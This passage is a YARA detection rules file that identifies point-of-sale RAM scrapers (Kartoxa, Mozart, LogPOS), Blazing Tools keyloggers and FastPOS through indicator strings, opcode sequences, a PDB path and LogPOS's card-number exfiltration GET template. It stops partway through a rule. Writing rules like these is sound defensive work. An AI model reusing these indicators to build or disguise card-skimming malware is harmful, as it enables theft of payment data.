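// POS memory scraper: a PE with three of nine strings. Note $s8 ("ATTERN") is a
// substring of $s6 ("<pid> <PATTERN>"), so a file containing $s6 already satisfies
// two of the three required hits; the threshold is effectively $s6 plus one more.
rule pos_memory_scrapper_
{
    meta:
        author = "@patrickrolsen"
        maltype = "Point of Sale (POS) Malware Memory Scraper"
        version = "0.3"
        description = "POS Memory Scraper"
        date = "01/30/2014"
    strings:
        $s1 = "kartoxa" nocase
        $s2 = "CC2 region:"
        $s3 = "CC memregion:"
        $s4 = "target pid:"
        $s5 = "scan all processes:"
        $s6 = "<pid> <PATTERN>"
        $s7 = "KAPTOXA"
        $s8 = "ATTERN"
        $s9 = "\\svhst%p"
    condition:
        uint16(0) == 0x5A4D and 3 of ($s*)
}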
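// Blazing Tools keylogger products: a PE with the vendor domain and both UTF-16
// feature labels ("Keystrokes", "Screenshots"). Commercial monitoring software;
// treat as a policy/triage signal.
rule blazingtools
{
    meta:
        author = "@patrickrolsen"
        reference = "Blazing Tools - http://www.blazingtools.com (Keyloggers)"
    strings:
        $s1 = "blazingtools.com"
        $s2 = "Keystrokes" wide
        $s3 = "Screenshots" wide
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}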
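// Mozart POS RAM scraper. Fires on any one of: the PDB path, the "garbage.tmp"
// output file name ($output is that ASCII string plus NUL), or the encoding routine's
// opcode pattern; alternatively on both fake service-name strings together.
// No MZ or filesize gate.
rule Mozart
{
    meta:
        author = "Nick Hoffman - Morphick Inc"
        description = "Detects samples of the Mozart POS RAM scraping utility"
        reference = "http://securitykitten.github.io/the-mozart-ram-scraper/"
    strings:
        $pdb = "z:\\Slender\\mozart\\mozart\\Release\\mozart.pdb" nocase wide ascii
        $output = {67 61 72 62 61 67 65 2E 74 6D 70 00} // "garbage.tmp\0"
        $service_name = "NCR SelfServ Platform Remote Monitor" nocase wide ascii
        $service_name_short = "NCR_RemoteMonitor"
        $encode_data = {B8 08 10 00 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 8B AC 24 14 10 00 00 89 84 24 0C 10 00 00 56 8B C5 33 F6 33 DB 8D 50 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C2 89 44 24 0C ?? ?? 8B 94 24 1C 10 00 00 57 8B FD 2B FA 89 7C 24 10 ?? ?? 8B 7C 24 10 8A 04 17 02 86 E0 BA 40 00 88 02 B8 ?? ?? ?? ?? 46 8D 78 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C7 3B F0 ?? ?? 33 F6 8B C5 43 42 8D 78 01 8A 08 40 84 C9 ?? ?? 2B C7 3B D8 ?? ?? 5F 8B B4 24 1C 10 00 00 8B C5 C6 04 33 00 8D 50 01 8A 08 40 84 C9 ?? ?? 8B 8C 24 20 10 00 00 2B C2 51 8D 54 24 14 52 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B D6 5E 8D 44 24 0C 8B C8 5D 2B D1 5B 8A 08 88 0C 02 40 84 C9 ?? ?? 8B 8C 24 04 10 00 00 E8 ?? ?? ?? ?? 81 C4 08 10 00 00}
    condition:
        any of ($pdb, $output, $encode_data) or
        all of ($service*)
}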
// https://otx.alienvault.com/pulse/56c6541867db8c125017a17f
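// LogPOS: the PEB-walk opcode sequence ($sc, disassembled in the comments below) is
// mandatory, combined with either the mailslot name or the exfiltration GET template.
// No MZ or filesize gate.
rule LogPOS
{
    meta:
        author = "Morphick Security"
        description = "Detects Versions of LogPOS"
        md5 = "af13e7583ed1b27c4ae219e344a37e2b"
    strings:
        $mailslot = "\\\\.\\mailslot\\LogCC"
        $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process="
        //64A130000000      mov eax, dword ptr fs:[0x30]
        //8B400C        mov eax, dword ptr [eax + 0xc]
        //8B401C        mov eax, dword ptr [eax + 0x1c]
        //8B4008        mov eax, dword ptr [eax + 8]
        $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 }
    condition:
        $sc and 1 of ($mailslot,$get)
}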
// https://otx.alienvault.com/pulse/57f5911b41c73131b588f79b
rule PoS_Malware_fastpos2 : FastPOS2   
   {   
   meta: